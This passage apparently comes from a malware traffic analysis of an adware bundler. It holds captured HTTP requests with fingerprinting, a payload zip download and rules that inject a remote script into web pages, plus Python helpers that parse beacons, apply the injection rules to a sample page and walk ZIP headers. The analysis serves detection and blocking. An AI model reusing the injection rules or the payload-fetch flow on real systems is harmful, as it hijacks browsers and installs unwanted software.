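     + "?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us"
     + "&update2=language,en&update3=version,4.0.1.2105"),
    ("Thu, 23 Apr 2015 07:24:54 GMT", BASE + "sof-installer/" + UID
     + "?action=pcm.installer.istartsurf.RegWrite"),
]


def parse_beacon(url):
    """Split /v4/<product>/<uid>?... into product, uid, event list, profile dict."""
    parts = urlsplit(url)
    segs = parts.path.strip("/").split("/")
    if len(segs) != 3 or segs[0] != "v4":
        raise ValueError("not a /v4/<product>/<uid> beacon: " + parts.path)
    actions, updates = [], {}
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        m = KEY_RE.match(key)
        if m is None:
            continue
        if m.group(1) == "action":
            actions.append(value)
        else:
            field, _, val = value.partition(",")
            updates[field] = val
    return {"product": segs[1], "uid": segs[2], "actions": actions, "updates": updates}


def looks_like_vm(uid):
    """Undo the assumed 'space -> X' encoding of the drive model and look for hypervisor names."""
    model = uid.split("_", 1)[0].replace("X", " ").lower()
    return any(marker in model for marker in VM_MARKERS)


def timeline(captured):
    """Beacons ordered by the server Date header (one-second resolution)."""
    events = []
    for date, url in captured:
        rec = parse_beacon(url)
        rec["ts"] = datetime.strptime(date, "%a, %d %b %Y %H:%M:%S GMT")
        events.append(rec)
    events.sort(key=lambda e: e["ts"])
    return events


if __name__ == "__main__":
    for e in timeline(CAPTURED):
        print(e["ts"].strftime("%H:%M:%S"), e["product"], e["actions"], e["updates"])
    print("sandbox uid:", looks_like_vm(UID))
```

The sorted output puts the `pcm.visit.istartsurf` visit first and the heartbeat and searchprotect install last; the `update` fields on the first beacon (ref, identifier, version, nation, language) are the profile the operator stores against the uid. Because the uid is built from hardware identity, a blocking or sinkhole rule should match the `/v4/<product>/` path prefix and the hostname, not the uid value.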

POST /namen.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.amoninst.com
Content-Length: 70
Connection: Keep-Alive

campid=9664&i=MyBestOffersTodayBR&prefix=amisetup5755&version=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Thu, 23 Apr 2015 07:24:05 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 171
Connection: keep-alive
[Data]
exe=amisetup5755.exe
url=hXXp://VVV.downloadcrest.com/tdownload.php
params=version=1.1.2.41&s1=57a0c198e2d39f18102a94c10225f3efec999268&t1=1429774025&campid=9664


GET /install.gif?bundle=istartsurf&ptid=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: log.very911.com
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Server: Tengine/1.2.2
Date: Thu, 23 Apr 2015 07:24:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 693
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>
..<head><title>404 Not Found</title></head>..&
lt;body bgcolor="white">..<h1>404 Not Found</h1>..<p
>The requested URL was not found on this server. Sorry for the inco
nvenience.<br/>..Please report this message and include the foll
owing information to us.<br/>..Thank you very much!</p>..&
lt;table>..<tr>..<td>URL:</td>..<td>hXXp://
log.very911.com:8080/install.gif?bundle=istartsurf&ptid=pcm&ui
d=VMwareXVirtualXIDEXHardXDrive_00000000000000000001</td>..</
tr>..<tr>..<td>Server:</td>..<td>us-pub00.v
9.com</td>..</tr>..<tr>..<td>Date:</td>.
.<td>2015/04/23 02:24:30</td>..</tr>..</table>
..<hr/>Powered by Tengine/1.2.2..</body>..</html>..H
TTP/1.1 404 Not Found..Server: Tengine/1.2.2..Date: Thu, 23 Apr 2015 0
7:24:30 GMT..Content-Type: text/html; charset=utf-8..Content-Length: 6
93..Connection: keep-alive..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTM
L 2.0//EN">..<html>..<head><title>404 Not Found&l
t;/title></head>..<body bgcolor="white">..<h1>404
Not Found</h1>..<p>The requested URL was not found on thi
s server. Sorry for the inconvenience.<br/>..Please report this
message and include the following information to us.<br/>..Thank
you very much!</p>..<table>..<tr>..<td>UR

<<< skipped >>>

GET /s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://VVV.4threquest.me/registro/310113f8.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: e0.extreme-dm.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 23 Apr 2015 07:23:56 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Cache-Control: private,no-cache,no-store
Pragma: no-cache
Expires: Mon, 28 Sep 1970 06:00:00 GMT
GIF89a.............!.......,...........L..;..


GET /mobile/mt-core.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 23 Apr 2015 07:23:57 GMT
Server: Apache
Last-Modified: Fri, 04 Mar 2011 18:46:26 GMT
ETag: "1448627-161ce-49dac90326480"
Accept-Ranges: bytes
Content-Length: 90574
Connection: close
Content-Type: application/x-javascript
/*.---.MooTools: the javascript framework..web build:. - hXXp://mootoo
ls.net/core/7c56cfef9dddcf170a5d68e3fb61cfd7..packager build:. - packa
ger build Core/Core Core/Array Core/String Core/Number Core/Function C
ore/Object Core/Event Core/Browser Core/Class Core/Class.Extras Core/S
lick.Parser Core/Slick.Finder Core/Element Core/Element.Style Core/Ele
ment.Event Core/Element.Dimensions Core/Fx Core/Fx.CSS Core/Fx.Tween C
ore/Fx.Morph Core/Fx.Transitions Core/Request Core/Request.HTML Core/R
equest.JSON Core/Cookie Core/JSON Core/DOMReady Core/Swiff..copyrights
:. - [MooTools](hXXp://mootools.net)..licenses:. - [MIT License](htt
p://mootools.net/license.txt).....*/.(function(){this.MooTools={versio
n:"1.3.1",build:"af48c8d589f43f32212f9bb8ff68a127e6a3ba6c"};var e=this
.typeOf=function(i){if(i==null){return"null";}if(i.$family){return i.$
family();.}if(i.nodeName){if(i.nodeType==1){return"element";}if(i.node
Type==3){return(/\S/).test(i.nodeValue)?"textnode":"whitespace";}}else
{if(typeof i.length=="number"){if(i.callee){return"arguments";.}if("it
em" in i){return"collection";}}}return typeof i;};var u=this.instanceO
f=function(w,i){if(w==null){return false;}var v=w.$constructor||w.cons
tructor;.while(v){if(v===i){return true;}v=v.parent;}return w instance
of i;};var f=this.Function;var r=true;for(var q in {toString:1}){r=nul
l;}if(r){r=["hasOwnProperty","valueOf","isPrototypeOf","propertyIsEnum
erable","toLocaleString","toString","constructor"];.}f.prototype.overl
oadSetter=function(v){var i=this;return function(x,w){if(x==null){

<<< skipped >>>

GET /registro/carregando.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:39 GMT
Content-Type: image/gif
Content-Length: 4176
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 23 May 2015 07:24:39 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GIF89a . ........{...........................l..D..N..............L.}.
..........................6...........z..<..(..,.....v.....".....V.
....... ....................&........>.....t.................0.....
...B.................Z..$.....~..r..............|.....h..j........`...
.....x........X..2.................*..b..^.....p......................
.....................................................!..NETSCAPE2.0...
..!..Created with ajaxload.info.!.......,.... . ......................
)...).4.)...3....*.5..A..9@..... ..&.....<........ ........)KFN....
!.......%....."..!'.........,..D......#..6...`xU....-T......A. d .....
..1.. ...._.r`...A......Q.'.L.pH`A....Q0BKA....1.......F..`...c.pdld..
....(.`b.....R.p"...a.=xa!./{..6...B...?6.%b..Ru$`..2$....6dC..E.c!F(C
.A.S.%hE.......@.. ...$'rbP..I.)D.v.........(....wFj..2....3>X.p@..
cF<.:..I....T.....#.JD'.7....-.MK...%&...`...@.!.......,.... . ....
........TT).......I((K/.....4F....F......K....I........AFL..FA.....(.X
MDF..%....$..:(NI..........<....<(0.6[C..I...B!.$.EZ..3...Q.8.$.
.8V r`B."..o.n.)....O.`0..L..'."(H..c#.....B..?..081....[0........' .B
......~` A....FB(......M;z.".D<......bC....t1J...'U.j......!....$..
.....u.......8.{e..#Q........%.UP.N..(N.....D.&.....$s..`G...eJ&.8D0..
A.....).....K.j..E....<H1."..B.j.:...N.<z...c..! @..b.c..!sP...
H.......!.......,.... . ..................E]A......K.5F#.....O ..%@-..
..........>@L..:...D.8'....N.[.<.-\..Q.'["&../_...%%:..M...O..%.
..T...:.&9A*G.,.N.&......J.......T.`.......s....B.Np.!...'..(.....

<<< skipped >>>

POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.amoninst.com
Connection: Keep-Alive
Cache-Control: no-cache
Content-Length: 309

Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=B3920CF566AB717F84CE9CE32F62B904&Sysid1=B3920CF566AB717F84CE9CE32F62B904&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&ci=9664&exe=amisetup5755__9664&ffver=&i=MyBestOffersTodayBR&lang_DfltUser=0409&netfs=3&s=Y&ts=1429773854&ver=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 23 Apr 2015 07:24:25 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
15d1....      ..      ..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0
1 Transitional//EN">..<html>..<head>..<meta http-equ
iv="content-type" content="text/html; charset=UTF-8" /> ..<title
>Installer</title>..<base href="hXXp://VVV.amoninst.com:80
/index.php" />..<script type="text/javascript" src="hXXp://cdn1.
downloadcrest.com/V19/amipb.js"></script>..<script type="t
ext/javascript">..var g_amiobj = '', g_ami, g_updb = false, g_close
= '0', g_additional_offer_list = '0';..var g_finish_install_button =
'0';..var g_popup_install_all = '0';..var g_eula = ''; ..var g_post1 =
'_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c90
7b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl
=&_netfs=-31&_vert=3';..var g_icon = '';..var g_comps = [], g_pages =
[], c, g_curPage = -1;..var g_cid = '9664';..var g_tid = '';..var g_cc
= 'UA';..var g_lang = 'en';..var g_ip = '37.57.16.189';..var g_browse
r = 'ie';..var g_cnt = '3ad80c247cbd60f855b8cf1954a59b1b';..var g_ver
= '1.1.2.41';..var g_buttonImage = 1;..var g_thanks = 'thankyou.php';.
.var g_images = [];..var g_purl = 'hXXp://VVV.amoninst.com:80/pix.php'
;..var g_skipCats = 0;..var g_ieVer = '6.0';..var g_chVer = '';..var g
_ffVer = '';..var g_netfs = -31;..var g_vert = 3;..var g_os = "NT5.1
SP3";..var g_current_screen = '';..var g_custom_next_button_event = '0
';..var g_custom_next_button = '0';..var g_install_all = 0;....functio
n InitInstall()..{.. g_ami.AddThanksParameter('tid', g_tid);..

<<< skipped >>>

POST /finalize.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.amoninst.com/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.amoninst.com
Content-Length: 229
Connection: Keep-Alive
Cache-Control: no-cache

_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_updater=0&r_MyBestOffersTodayBR=0.01&updater=3&MyBestOffersTodayBR=2
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 23 Apr 2015 07:24:28 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 2409
Connection: keep-alive
....<Array><page><f>1</f><fb>1</fb>
;<pt>0</pt><cats>0</cats><updh>1</upd
h><wrn></wrn><comps></comps><must_show&g
t;0</must_show><bdy>PGRpdiBjbGFzcz0iY2xhc3MtMWxpbmVyIj48ZG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 IGFuZCA8YSBo
cmVmPSJodHRwOi8vZ29vLmdsL1NIcDhSZyIgdGFyZ2V0PSJfYmxhbmsiPlByaXZhY3kgUG
9saWN5PC9hPiBhbmQgY29uc2VudCB0byBpbnN0YWxsIE15IEJlc3QgT2ZmZXJzIFRvZGF5
Ljwvc3Bhbj48L2Rpdj48L2Rpdj48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0iMSIgaW
Q9ImlfYW1pX3VwZGF0ZXIiLz48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0idXBkYXRl
cixNeUJlc3RPZmZlcnNUb2RheUJSIiBpZD0iYWxsX3Nob3J0X25hbWVzIi8 </bdy&g
t;<img>__empty__</img></page><page><f>1&
lt;/f><fb>0</fb><pt>1</pt><cats>0<
/cats><updh>1</updh><wrn></wrn><comps>
;</comps><must_show>0</must_show><bdy>DQo8

<<< skipped >>>

POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.amoninst.com
Connection: Keep-Alive
Content-Length: 1340

_srvlog=&browser=ie&c[MyBestOffersTodayBR][r]=0.01&c[MyBestOffersTodayBR][s]=-1&c[updater][r]=0&c[updater][s]=-1&capp=updater&cc=UA&cid=9664&clip=37.57.16.189&cmdl=amisetup5755__9664.exe /s  /ver 1.1.2.41  /u http://VVV.amoninst.com/index.php /ta /ci 9664 /i MyBestOffersTodayBR&cnt=3ad80c247cbd60f855b8cf1954a59b1b¤t_screen=Finish_Last_Screen&is=-31&netfs=-31&os=NT5.1SP3&sysid=B3920CF566AB717F84CE9CE32F62B904&sysid1=B3920CF566AB717F84CE9CE32F62B904&te=1429773860&tid=&ts=1429773854&ver=1.1.2.41&vert=3&mh=91c1b2cbe72cfa41cf10f8484f47dffe909b4dcf&base=_srvlog=&browser=ie&c%5BMyBestOffersTodayBR%5D%5Br%5D=0.01&c%5BMyBestOffersTodayBR%5D%5Bs%5D=-1&c%5Bupdater%5D%5Br%5D=0&c%5Bupdater%5D%5Bs%5D=-1&capp=updater&cc=UA&cid=9664&clip=37.57.16.189&cmdl=amisetup5755__9664.exe+%2Fs++%2Fver+1.1.2.41++%2Fu+http%3A%2F%2FVVV.amoninst.com%2Findex.php+%2Fta+%2Fci+9664+%2Fi+MyBestOffersTodayBR&cnt=3ad80c247cbd60f855b8cf1954a59b1b¤t_screen=Finish_Last_Screen&is=-31&netfs=-31&os=NT5.1SP3&sysid=B3920CF566AB717F84CE9CE32F62B904&sysid1=B3920CF566AB717F84CE9CE32F62B904&te=1429773860&tid=&ts=1429773854&ver=1.1.2.41&vert=3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Thu, 23 Apr 2015 07:24:29 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
....      ..HTTP/1.1 200 OK..Content-Type: text/plain; charset=UTF-8..
Date: Thu, 23 Apr 2015 07:24:29 GMT..Server: Apache/2.2.15 (Red Hat)..
X-Powered-By: PHP/5.3.3..Content-Length: 14..Connection: keep-alive...
... ....


GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.dlzip1.istartsurf.finish,9 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:17 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
57.............V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<.
...........T..Z.....H.....0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Da
te: Thu, 23 Apr 2015 07:24:17 GMT..Content-Type: text/html; charset=ut
f-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By:
PHP/5.3.3..xa-api-version: v4..Content-Encoding: gzip..57............
.V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<............T..
Z.....H.....0..


GET /services/rules.txt?dummy=243 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:37 GMT
Content-Type: text/plain
Content-Length: 180
Connection: keep-alive
Last-Modified: Thu, 26 Mar 2015 16:45:36 GMT
ETag: "57c94d-b4-51233beb94c00"
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
Accept-Ranges: bytes
</head>|<script src="hXXps://VVV.njaxjs.me/services/script.js
"></script></head>.{njax_null}|<script src="hXXps://
VVV.njaxjs.me/services/script.js" type="text/javascript"></scrip
t>.HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:
24:37 GMT..Content-Type: text/plain..Content-Length: 180..Connection:
keep-alive..Last-Modified: Thu, 26 Mar 2015 16:45:36 GMT..ETag: "57c94
d-b4-51233beb94c00"..P3P: CP="Potato"..X-Cache: MISS..X-Server: Provid
ed by Intermedia..X-Country: EU..Accept-Ranges: bytes..</head>|&
lt;script src="hXXps://VVV.njaxjs.me/services/script.js"></scrip
t></head>.{njax_null}|<script src="hXXps://VVV.njaxjs.me/s
ervices/script.js" type="text/javascript"></script>.
..
..
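The rules.txt body above is the only place in this capture where the injector's configuration is visible in clear text. Read as one `search|replacement` pair per line, the first rule replaces `</head>` with a script tag loading script.js from njaxjs.me followed by a fresh `</head>`, and the second replaces a `{njax_null}` placeholder with the same script; that interpretation is inferred from the captured bytes, not documented behaviour. The following is an added example, not code from the page or from the software described, that parses rules in that shape, applies them to a constructed HTML page, and then lists the external script hosts so the client-side rewrite can be compared with the page as the origin served it. The sample rule text restores the defanged host to plain form so the parser sees real syntax.

```python
import re
from typing import List, Tuple

# Constructed sample in the shape of the captured rules.txt body; the two
# rules are the ones seen in the response, with hXXps/VVV defanging undone.
SAMPLE_RULES = (
    '</head>|<script src="https://www.njaxjs.me/services/script.js"></script></head>\n'
    '{njax_null}|<script src="https://www.njaxjs.me/services/script.js" type="text/javascript"></script>\n'
)

# Constructed sample page standing in for whatever the browser requested.
SAMPLE_PAGE = (
    "<html><head><title>shop</title></head>"
    "<body><p>catalogue</p>{njax_null}</body></html>"
)


def parse_rules(text: str) -> List[Tuple[str, str]]:
    """Split each non-empty line at the first '|' into (search, replacement).

    Assumption: one 'search|replacement' pair per line, as the captured body
    suggests. A line without '|' is skipped rather than guessed at.
    """
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or "|" not in line:
            continue
        search, replacement = line.split("|", 1)
        rules.append((search, replacement))
    return rules


def apply_rules(page: str, rules: List[Tuple[str, str]]) -> str:
    """Apply each rule to every occurrence, in file order.

    The first rule's replacement contains '</head>' itself, so a loop that
    re-scanned its own output would inject without end; str.replace scans
    the input once, which is what an injector has to do as well.
    """
    for search, replacement in rules:
        page = page.replace(search, replacement)
    return page


SCRIPT_SRC = re.compile(r'<script[^>]+src="([^"]+)"', re.IGNORECASE)


def injected_script_hosts(page: str) -> List[str]:
    """Hosts of every external <script src=...> in the page.

    Diffing this list against the same page fetched without the infected
    client isolates the injector's footprint (here www.njaxjs.me).
    """
    hosts = []
    for src in SCRIPT_SRC.findall(page):
        m = re.match(r"https?://([^/]+)/", src)
        if m:
            hosts.append(m.group(1).lower())
    return hosts


if __name__ == "__main__":
    rewritten = apply_rules(SAMPLE_PAGE, parse_rules(SAMPLE_RULES))
    print(rewritten)
    print(injected_script_hosts(rewritten))
```

Both rules point at the same script, so a page rewritten this way carries the njaxjs.me host once in the head and once wherever the placeholder sat; the head injection works on any HTML page, the placeholder one only on pages the operator prepared.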



GET /services/update.php?v=1.2.0&key=FVz40gdklAiQUMMUD3ARa8NDKI9Pp0VX&dummy=708 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.ninjasoftwarellc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:38 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: EU
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:38 
GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-aliv
e..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia
..X-Country: EU..


GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.hp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.56 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 23 Apr 20
15 07:24:28 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.56 ms","message":"store 1 ac
tion and 0 update "}..0..


GET /3517/2 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 23 Apr 2015 04:24:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Location: hXXp://VVV.tjepgz.cc/files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip
0......



GET /files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 Apr 2015 04:24:07 GMT
Content-Type: application/zip
Content-Length: 2975087
Last-Modified: Tue, 14 Apr 2015 08:23:03 GMT
Connection: keep-alive
ETag: "552cce67-2d656f"
Accept-Ranges: bytes
PK...........F................479.db.../.u.>p..m....<..A#.<y.
...\..-2...a7."....}.zx....(....N.J8...t.J.-Q..C$....G.!;Q`..%...D.>
;uZ....s.L........* ...i.5A.`.....j._\.....e.M. ..}.....\.3.[......m..
...Z......5oV.Q7..c.x......U...5...........6OsxTJniPK..........bF]=...
...........wpm_v20.0.0.1953_0302.exe..S.nM....m....m..m..m..l..m.:.\..
.E....s{.*F.5j.......z.......T.C.t.f.,f..y.^.a.....P.3.O^:.~L....(....
...Z..,...R...xN......*g...2.._.i.y..A[7..K%...W... Jn.ET.d3.8.A.Rpi&g
t;..E..}.......Eb.L/..../.Q.../..q...........[.VZ..4_..J.4.(...{..SQ..
..f....*.....1.}BO..........gD..?..|od...W..].6..a.E....*Rz...&...G...
..5.dW ..nD7&..4C2......zb.Be..[....T(b...rj..4X....g........u>Y..~
..D!...5.Z...w.....w.[...N......M.........i....l..3..."..W7.D.t.......
..Cv.r.-........N..1..B...<.......zI.......G.F#Al...;..L..[.j.g.w._
...~z.../......s...h]..R........K...1....v}~..].....Rd]?a....#.".]r..-
..x....Z...z|`.......x..)..4/...........N..aQG...lq.4`..`....d>....
.wGyf.q.RzN.....9,.t.Rr..=......M.%....l[>..Bt.<...D..G..S4.$s.g
..... ...Y.N.h`..Y...3.5.m."..Pfc%j..$.....R...J..i..x...?J.T.)L..@%..
....F9..L.#..`}7....q.%....sj.]. ...r.../z..Ff.<x-b.d..P..pE..l`k.?
:n..Aq.....<..F.....^..r...7.b\....}.,$.p)<..Q.....U.>.D.....
@}4u.....N....#..A 4g2.uU.r}"......#X....d.{.)..........R..m.DR.d.2...
....o#....30O......(g(H.Aro...0.P....tt5.7@W4;....BR.J1^Lf....H'..q...
HMA..of.]w#..?..I..~>FL2.T.v:.&\..${.KB......o.Z.R.&.<....Zf)...
".D<...@_.....WE....*.[\.b..W._?.S{.x..,....pP...qC\. ....zC...

<<< skipped >>>
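The 2.zip response above is 2975087 bytes on the wire but only its first few hundred are shown, and even so the local file headers already name two entries, 479.db and wpm_v20.0.0.1953_0302.exe (the latter also appears in the process list). A ZIP's central directory sits at the end of the file, so a truncated capture has no index; the local headers at the front still give the entry names and sizes. The following is an added example, not code from the page or from any tool named on it, that walks local headers from the start of a possibly truncated stream. The sample stream is constructed here with placeholder contents under the two captured names and cut short deliberately; the real archive's contents are not on the page.

```python
import struct
import zlib
from typing import List, Tuple

LOCAL_HEADER = struct.Struct("<4sHHHHHIIIHH")   # 30-byte local file header
LOCAL_SIG = b"PK\x03\x04"
DATA_DESCRIPTOR_FLAG = 0x0008                    # sizes follow the data instead


def local_header(name: bytes, data: bytes) -> bytes:
    """Build one STORED (method 0) entry: header, name, data.

    Used only to construct the sample stream; the CRC is filled in so the
    header is well-formed even though the walker never checks it.
    """
    crc = zlib.crc32(data) & 0xFFFFFFFF
    hdr = LOCAL_HEADER.pack(LOCAL_SIG, 20, 0, 0, 0, 0, crc,
                            len(data), len(data), len(name), 0)
    return hdr + name + data


# Constructed sample: the two entry names seen in the captured 2.zip with
# placeholder bodies, then truncated inside the second entry's data.
_full = (
    local_header(b"479.db", b"placeholder-db-bytes" * 4)
    + local_header(b"wpm_v20.0.0.1953_0302.exe", b"MZ" + b"\x00" * 200)
)
SAMPLE_STREAM = _full[:220]


def walk_local_headers(stream: bytes) -> List[Tuple[str, int, bool]]:
    """Return (name, compressed_size, complete) for each reachable entry.

    Advances by the compressed size stored in each local header, so no
    central directory is needed. Stops, rather than guessing, at an entry
    whose sizes are zero with the data-descriptor flag set, because its
    length is then only recorded after the data.
    """
    entries = []
    pos = 0
    while pos + LOCAL_HEADER.size <= len(stream):
        (sig, _ver, flags, _method, _time, _date, _crc,
         csize, _usize, nlen, xlen) = LOCAL_HEADER.unpack_from(stream, pos)
        if sig != LOCAL_SIG:
            break                       # central directory or junk reached
        name_start = pos + LOCAL_HEADER.size
        name = stream[name_start:name_start + nlen].decode("cp437", "replace")
        data_start = name_start + nlen + xlen
        if flags & DATA_DESCRIPTOR_FLAG and csize == 0:
            entries.append((name, csize, False))
            break
        complete = data_start + csize <= len(stream)
        entries.append((name, csize, complete))
        pos = data_start + csize
    return entries


if __name__ == "__main__":
    for name, size, complete in walk_local_headers(SAMPLE_STREAM):
        print(f"{name:30} {size:8d} {'ok' if complete else 'truncated'}")
```

A complete entry can be carved out and hashed on its own; an incomplete one still yields the name and the declared size, which is enough to match it against the dropped file in the process list.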

